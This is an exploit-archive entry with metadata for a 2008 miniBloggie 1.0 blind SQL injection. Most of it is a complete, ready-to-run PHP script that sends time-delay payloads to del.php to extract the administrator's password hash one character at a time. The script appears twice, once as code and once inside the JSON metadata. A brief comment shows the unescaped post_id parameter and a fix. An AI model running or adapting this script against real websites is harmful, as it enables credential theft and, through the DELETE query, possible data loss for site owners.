ID 1337DAY-ID-3915
Type zdt
Reporter StAkeR
Modified 2008-10-18T00:00:00
Description
Exploit for unknown platform in category web applications
============================================================
miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
============================================================
#!/usr/bin/php
<?php
error_reporting(0);
/*
miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
------------------------------------------------------------
Author -> StAkeR aka athos
Date -> 18/10/2008
------------------------------------------------------------
File del.php
25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
27.
28. if ($confirm=="") {
29. notice("Confirmation", "Warning : Do you want to delete this post ? <a href=del.php?post_id=".$post_id."&confirm=yes>Yes</a>");
30. }
31. elseif ($confirm=="yes") {
32. // Data Base Connection //
33. dbConnect();
34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
35. $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
36. $confirm ="";
37. notice("Del Post", "Data Deleted");
38. }
39. else notice( "Delete Error, Unable to complete the task !" );
40. ?>
NOTE:
$sql = "DELETE FROM blogdata WHERE post_id=$post_id";
$post_id isn't escaped so you can execute SQL Code
How to fix? sanize $post_id with intval or int (PHP Functions)
*/
function get($host,$path,$evil)
{
if(!preg_match('/\w:[0-9]/i',$host)) alert();
$inet = explode(':',$host);
if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');
$data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
$data .= "Host: $host[0]\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";
fputs($sock,$data);
while(!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
function alert()
{
echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
die;
}
function charme($char,$colum,$id)
{
$sql = "1 or (select if((ascii(substring(password".
",$colum,1))=$char),benchmark(200000000,char(0)),0)".
" from blogusername where id=$id)#";
return urlencode($sql);
}
$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$c = 0;
for($i=0;$i<=32;$i++)
{
for($j=0;$j<=17;$j++)
{
$start = time();
get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));
$stop = time();
if($stop - $start > 12)
{
$password .= chr($hash[$j]);
$c++;;
break;
}
}
}
if(isset($password))
{
echo "# Hash: $password\r\n";
die;
}
else
{
echo "# Exploit Failed!\r\n";
}
?>
# 0day.today [2018-01-10] #
{"published": "2008-10-18T00:00:00", "id": "1337DAY-ID-3915", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 1.3, "vector": "NONE", "modified": "2018-01-10T19:06:04", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310875734", "OPENVAS:1361412562310875548", "OPENVAS:1361412562311220191613", "OPENVAS:1361412562310876709"]}, {"type": "mskb", "idList": ["KB4484098", "KB4462143"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1613.NASL", "REDHAT-RHSA-2019-0971.NASL", "ORACLELINUX_ELSA-2019-0971.NASL", "SLACKWARE_SSA_2019-092-01.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-0971"]}, {"type": "redhat", "idList": ["RHSA-2019:0971", "RHSA-2019:0652"]}, {"type": "slackware", "idList": ["SSA-2019-092-01"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/LOCAL/EMACS_MOVEMAIL", "MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_CODER_EXEC", "MSF:EXPLOIT/UNIX/WEBAPP/GET_SIMPLE_CMS_UPLOAD_EXEC", "MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE", "MSF:EXPLOIT/UNIX/WEBAPP/WEBMIN_UPLOAD_EXEC", "MSF:EXPLOIT/UNIX/X11/X11_KEYBOARD_EXEC"]}], "modified": "2018-01-10T19:06:04", "rev": 2}, "vulnersScore": 1.3}, "type": "zdt", "lastseen": "2018-01-10T19:06:04", "edition": 2, "title": "miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit", "href": "https://0day.today/exploit/description/3915", "modified": "2008-10-18T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/3915", "references": [], "reporter": "StAkeR", "sourceData": "============================================================\r\nminiBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/php \r\n<?php\r\n\r\nerror_reporting(0);\r\n\r\n\r\n/*\r\n miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n ------------------------------------------------------------\r\n Author -> StAkeR aka athos \r\n Date -> 18/10/2008\r\n ------------------------------------------------------------\r\n \r\n File del.php\r\n \r\n 25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];\r\n 26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];\r\n 27.\r\n 28. if ($confirm==\"\") { \r\n 29. notice(\"Confirmation\", \"Warning : Do you want to delete this post ? <a href=del.php?post_id=\".$post_id.\"&confirm=yes>Yes</a>\");\r\n 30. }\r\n 31. elseif ($confirm==\"yes\") {\r\n 32. // Data Base Connection //\r\n 33. dbConnect();\r\n 34. $sql = \"DELETE FROM blogdata WHERE post_id=$post_id\";\r\n 35. $query = mysql_query($sql) or die(\"Cannot query the database.<br>\" . mysql_error());\r\n 36. $confirm =\"\";\r\n 37. notice(\"Del Post\", \"Data Deleted\");\r\n 38. }\r\n 39. else notice( \"Delete Error, Unable to complete the task !\" );\r\n 40. ?>\r\n\r\n NOTE:\r\n \r\n $sql = \"DELETE FROM blogdata WHERE post_id=$post_id\";\r\n \r\n $post_id isn't escaped so you can execute SQL Code \r\n \r\n How to fix? sanize $post_id with intval or int (PHP Functions)\r\n \r\n \r\n*/ \r\n\r\n\r\n\r\nfunction get($host,$path,$evil)\r\n{\r\n if(!preg_match('/\\w:[0-9]/i',$host)) alert();\r\n $inet = explode(':',$host);\r\n\r\n if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');\r\n \r\n $data .= \"GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\\r\\n\";\r\n $data .= \"Host: $host[0]\\r\\n\";\r\n $data .= \"User-Agent: Lynx (textmode)\\r\\n\";\r\n $data .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\n fputs($sock,$data);\r\n \r\n while(!feof($sock)) { $html .= fgets($sock); }\r\n fclose($sock);\r\n \r\n return $html;\r\n}\r\n\r\n\r\nfunction alert()\r\n{\r\n echo \"# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\\r\\n\";\r\n echo \"# Usage: php {$argv[0]} [host:port] [path] [user_id]\\r\\n\";\r\n echo \"# Usage: php {$argv[0]} localhost:80 /minibloggie 1\\r\\n\";\r\n die;\r\n}\r\n\r\n\r\nfunction charme($char,$colum,$id)\r\n{\r\n $sql = \"1 or (select if((ascii(substring(password\".\r\n \",$colum,1))=$char),benchmark(200000000,char(0)),0)\".\r\n \" from blogusername where id=$id)#\";\r\n \r\n return urlencode($sql);\r\n}\r\n\r\n\r\n$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);\r\n$c = 0;\r\n\r\n\r\nfor($i=0;$i<=32;$i++)\r\n{\r\n for($j=0;$j<=17;$j++)\r\n {\r\n $start = time();\r\n \r\n get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));\r\n \r\n $stop = time();\r\n \r\n if($stop - $start > 12)\r\n {\r\n $password .= chr($hash[$j]);\r\n $c++;;\r\n break;\r\n }\r\n }\r\n}\r\n\r\nif(isset($password))\r\n{\r\n echo \"# Hash: $password\\r\\n\";\r\n die;\r\n}\r\nelse\r\n{\r\n echo \"# Exploit Failed!\\r\\n\";\r\n}\r\n \r\n\r\n\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-10] #"}
{}
